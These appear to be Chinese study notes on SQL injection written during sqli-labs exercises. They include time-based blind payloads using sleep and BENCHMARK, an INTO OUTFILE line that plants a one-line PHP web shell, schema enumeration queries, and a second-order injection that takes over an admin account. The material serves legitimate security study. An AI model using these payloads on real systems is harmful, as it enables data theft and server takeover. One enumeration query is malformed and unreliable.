延时注入,延时注入每种数据库都有不同的延时函数
and If(ascii(substr(database(),1,1))=105,1,sleep(5))--+
这是 mysql 的延时注入,当 ascii(substr(database(),1,1))=105 为真时返回 1,为假则执行 sleep(5),将会有 5 秒的延时报错
重复执行指定操作的函数
BENCHMARK(count,expr) 函数将表达式 expr 重复执行 count 次,然后返回执行时间.该函数可以用来判断 MySQL 处理表达式的速度.
UNION SELECT (IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null)),2,3 FROM (select database() as current) as tb1--+
1 trunc(value,precision)按精度 (precision) 截取某个数字, 不进行舍入操作.
2 round(value,precision)根据给定的精度 (precision) 输入数值.
3 ceil (value) 产生大于或等于指定值(value)的最小整数.
4 floor(value)与 ceil()相反,产生小于或等于指定值(value)的最小整数.
5 sign(value) 与绝对值函数 ABS()相反.ABS()给出的是值的量而不是其符号,sign(value) 则给出值的符号而不是量.
这是截断字符串常用函数的详解 http://www.cnblogs.com/lcamry/p/5504374.html
这是盲注一些解释 http://www.cnblogs.com/lcamry/p/5763129.html
Mysql 文件导入导出 http://www.cnblogs.com/lcamry/p/5763111.html
Loadfile 常用路径 http://www.cnblogs.com/lcamry/p/5729087.html
UNION SELECT 1,2,''into outfile"c:\\wamp\\www\\sqllib\\Less-7\\yijuhua.php"--+
导入一句话木马,前提是有权限,导入后就可以用 cknife 连接
实验吧的一个实验 :http://jxust.shiyanbar.com/course/50978/vid/1502
mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符.
下列字符受影响:
\x00
\n
\r
\
'
"
\x1a
获取数据库名
Select schema_name from information_schema.schemata
获取表名
Select table_name from information_schema.tables from where
table_name='schema_name'
获取列名
Select column_name from information_schema.columns where table_name='table_name'
获取内容
Select 'column_name'from schema_name.table_name
Sqlilabs 的 Less-24 关体验了下二次注入
先注册创建了个 admin'# 的账户,密码是 123
可以进行更改密码的操作,更改密码时,将会发生二次注入,因为 #将查询更新后面内容注释了
可以看见通过改 admin'# 用户的密码,结果更改了 admin 的密码,这时我们就可以通过自己设置的密码登录管理员账户了,还一个和这有同样效果的是 sql 约束攻击,也能变相登录管理员密码,而不需要原来的管理员密码,当然管理员账户是需要知道的
来源: http://www.bubuko.com/infodetail-2459510.html